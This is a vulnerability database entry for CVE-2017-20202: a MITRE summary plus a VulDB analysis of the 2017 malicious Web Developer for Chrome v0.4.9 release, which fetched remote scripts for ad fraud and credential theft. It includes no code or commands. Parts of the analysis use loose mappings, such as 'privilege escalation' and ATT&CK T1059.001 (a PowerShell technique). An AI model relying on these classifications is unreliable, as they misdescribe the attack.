CVE-2017-20202 in Web Developer
Summary
by MITRE • 10/09/2025
Web Developer for Chrome v0.4.9 contained malicious code that generated a domain via a DGA and fetched a remote script. The fetched script conditionally loaded follow-on modules that performed extensive ad substitution and malvertising, displayed fake “repair” alerts that redirected users to affiliate programs, and attempted to harvest credentials when users logged in. Injected components enumerate common banner sizes for substitution, replace third-party ad calls, and redirect victim traffic to affiliate landing pages. Potential impacts include user-level code execution in the browser context, large-scale ad fraud and traffic hijacking, credential theft, and exposure to additional payloads delivered by the actor. The compromise was reported on by the maintainer of Web Developer for Chrome on August 2, 2017 and remediated in v0.5.0.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 10/09/2025
The vulnerability identified as CVE-2017-20202 represents a sophisticated supply chain attack targeting the Chrome Web Developer extension ecosystem. This malicious code was embedded within version 0.4.9 of the Web Developer extension, which was widely distributed through the Chrome Web Store. The attack leveraged domain generation algorithms to dynamically create command and control domains, enabling attackers to maintain persistent communication channels and deliver updated payloads. This approach aligns with common tactics used in advanced persistent threat campaigns where attackers employ dynamic infrastructure to evade detection and maintain operational resilience.
The technical flaw manifested through a combination of dynamic code loading mechanisms and domain generation algorithm implementation that allowed attackers to remotely fetch malicious scripts. The extension's legitimate functionality was subverted to include conditional loading of follow-on modules, which represents a classic example of code injection and privilege escalation. The malicious code performed extensive ad substitution by enumerating common banner sizes and replacing third-party ad calls, demonstrating sophisticated understanding of web advertising infrastructure. This technique directly relates to CWE-94, which describes inadequate control of generation of code, and reflects the broader category of malicious software that targets web browser extensions.
The operational impact of this vulnerability extended far beyond simple malicious advertising, encompassing comprehensive user data harvesting and system compromise. The malicious extension displayed fake "repair" alerts designed to deceive users into visiting affiliate landing pages, while simultaneously attempting to harvest credentials during login activities. This credential theft capability represents a significant security risk, as it could lead to account takeovers and broader compromise of user systems. The attack pattern demonstrates characteristics consistent with the ATT&CK framework's T1059.001 (Command and Scripting Interpreter) and T1566 (Phishing) techniques, where attackers establish initial access through legitimate software distribution channels and then escalate privileges through credential harvesting.
The malicious code's ability to redirect victim traffic to affiliate landing pages created substantial financial fraud opportunities, while the injection of additional payloads indicated a multi-stage attack approach. This methodology allows attackers to maintain persistence and deliver increasingly sophisticated malware components over time. The compromise affected users at the browser context level, meaning that executed code could potentially access browser sessions, cookies, and other sensitive data. The remediation process required the extension maintainer to release version 0.5.0, which addressed the malicious code injection and restored the extension's legitimate functionality. This incident highlights the critical importance of extension vetting processes and continuous monitoring of browser extension repositories for malicious code, as it represents a successful attack on the browser extension supply chain that could have been prevented through better code review and security testing practices.